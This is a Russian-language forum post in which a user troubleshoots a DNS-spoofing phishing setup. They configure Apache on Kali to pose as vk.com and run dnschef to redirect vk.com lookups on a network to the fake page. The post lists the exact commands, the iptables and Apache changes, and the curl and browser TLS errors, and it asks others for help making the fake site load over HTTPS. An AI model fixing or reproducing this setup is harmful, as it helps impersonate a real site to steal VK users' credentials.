Тема: не открывается фейк при dns подмене
Показать сообщение отдельно

  #37  
Старый 25.01.2019, 12:06
bot_st
Новичок
Регистрация: 21.01.2019
Сообщений: 29
С нами: 3848726

Репутация: 0
По умолчанию
Итоги после недавних опытов.

Настройки были таковы:

1)В файле less /etc/apache2/sites-enabled/* раскомментировал и изменил строчку #ServerName www.example.com на ServerName vk.com, а начало файла теперь выглядит так ""

2) Открыл 443 порт командой iptables -I INPUT -p tcp --dport 443 -j ACCEPT, затем командой a2enmod ssl включил модуль ssl, чтобы апач слушал 443 порт

3) Дабы проверить прослушиваемые порты ввёл команду lsof -nP -i, вот результат:

apache2 3722 www-data 4u IPv6 63084 0t0 TCP *:80 (LISTEN)

apache2 3722 www-data 6u IPv6 63088 0t0 TCP *:443 (LISTEN)

4) В роутере поменял ип днс, запустил апач командой service apache2 start, далее запустил днсчеф командой dnschef -i 192.168.0.103 --fakeip 192.168.0.103 --fakedomains vk.com, прослушка траффика пошла, вижу запросы

5) Далее, чтобы убедиться, что все остальные сайты кроме vk.com открываются нормально, а vk.com фейково ввожу команду ping, результаты:

PING google.com (173.194.44.68) 56(84) bytes of data.

64 bytes from 173.194.44.68 (173.194.44.68): icmp_seq=1 ttl=116 time=11.6 ms

PING vk.com (192.168.0.103) 56(84) bytes of data.

64 bytes from kali (192.168.0.103): icmp_seq=1 ttl=64 time=0.030 ms

6)Результаты команды curl -vv https://vk.com/ (пишу только результаты https, потому что http показывает скелет фейка сайта, а он слишком большой для данного поста)

* Trying 192.168.0.103...

* TCP_NODELAY set

* Connected to vk.com (192.168.0.103) port 443 (#0)

* ALPN, offering h2

* ALPN, offering http/1.1

* successfully set certificate verify locations:

* CAfile: none

CApath: /etc/ssl/certs

* TLSv1.3 (OUT), TLS handshake, Client hello (1):

* error:1408F10B:SSL routines:ssl3_get_record:wrong version number

* Closing connection 0

curl: (35) error:1408F10B:SSL routines:ssl3_get_record:wrong version number

7)Результаты команды telnet 192.168.0.103 80

Trying 192.168.0.103...

Connected to 192.168.0.103.

Escape character is '^]'.

Connection closed by foreign host.

И результат команды 192.168.0.103 443

Trying 192.168.0.103...

Connected to 192.168.0.103.

Escape character is '^]'.

Connection closed by foreign host.

8)Заметил такой факт, что при запуске команды service apache2 status присутствует такая строчка:

kali apachectl[3712]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' directive globally to suppress this message

9)Тестирую, работает ли фейк, ввожу в адресной строке браузера localhost и 192.168.0.103, фейк открывается

10)Ну и собственно, чищу днс кэш командой /etc/init.d/networking restart (на линукс) и ipconfig /flushdns (на винде) и пробую запустить вк в браузере:

Ошибка при установлении защищённого соединения

При соединении с vk.com произошла ошибка. SSL получило запись, длина которой превышает максимально допустимую. Код ошибки: SSL_ERROR_RX_RECORD_TOO_LONG

Господа, после всей изложенной информации у Вас есть ещё варианты как это пофиксить, прилизать и пригладить для корректной работы? ))) Быть может я ошибся в командах или где то не увидел ошибку, пожайлуста помогите
 
Ответить с цитированием